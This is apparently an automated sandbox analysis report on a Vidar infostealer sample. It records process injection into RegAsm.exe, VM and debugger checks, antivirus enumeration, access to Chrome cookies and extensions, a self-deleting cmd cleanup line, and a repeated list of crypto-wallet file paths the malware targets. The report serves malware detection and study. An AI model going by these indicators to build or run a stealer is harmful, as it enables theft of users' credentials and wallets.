Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: RegAsm.exe, 00000001.00000002.2107667144.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware?
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FA3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2107817674.0000000000F68000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: RegAsm.exe, 00000001.00000002.2107667144.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: RegAsm.exe, 00000001.00000002.2107817674.00000000010A1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node			graph_1-79927
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node			graph_1-78719

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00A0B916 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00A0B916

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

1_2_0041608F

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A0F2BC mov ecx, dword ptr fs:[00000030h]	0_2_00A0F2BC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A184AC mov eax, dword ptr fs:[00000030h]	0_2_00A184AC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A400D3 mov eax, dword ptr fs:[00000030h]	0_2_00A400D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_00415CD3 mov eax, dword ptr fs:[00000030h]	1_2_00415CD3

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00A1AAAB GetProcessHeap,

0_2_00A1AAAB

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A070C5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00A070C5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A0B916 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00A0B916
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A06E56 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00A06E56
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A06FB2 SetUnhandledExceptionFilter,	0_2_00A06FB2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_00419387 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_00419387
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_00417E5F memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00417E5F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_0041CF18 SetUnhandledExceptionFilter,	1_2_0041CF18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19822C8E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_19822C8E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_198242AF SetUnhandledExceptionFilter,	1_2_198242AF

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\file.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\file.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Jump to behavior

Searches for specific processes (likely to inject)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 1_2_0040FC40 _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

1_2_0040FC40

Writes to foreign memory regions

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 420000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42B000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 63E000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: A3C008	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\KFBFCAFCBKFI" & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00A2B400 cpuid

0_2_00A2B400

Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,	0_2_00A1A0E0
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	0_2_00A1A187
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	0_2_00A1A1D2
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_00A1A2F8
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	0_2_00A1A26D
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,	0_2_00A1A54B
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_00A1A674
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,	0_2_00A1A77A
Source: C:\Users\user\Desktop\file.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_00A1A849
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	0_2_00A11AC2
Source: C:\Users\user\Desktop\file.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	0_2_00A19EE5
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,	0_2_00A11FE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: _EH_prolog,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	1_2_0040E76B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	1_2_19822112
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	1_2_19822112
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	1_2_199FFF17
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	1_2_19A13300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	1_2_19823AA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	1_2_19A12DF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	1_2_19A12D38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	1_2_19A12CB6

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00A06D50 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00A06D50

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 1_2_0040E651 GetProcessHeap,HeapAlloc,GetUserNameA,

1_2_0040E651

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 1_2_0040E718 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

1_2_0040E718

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000F68000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2107817674.0000000000F85000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 0.2.file.exe.a2b000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.a2b000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.a00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7420, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7440, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
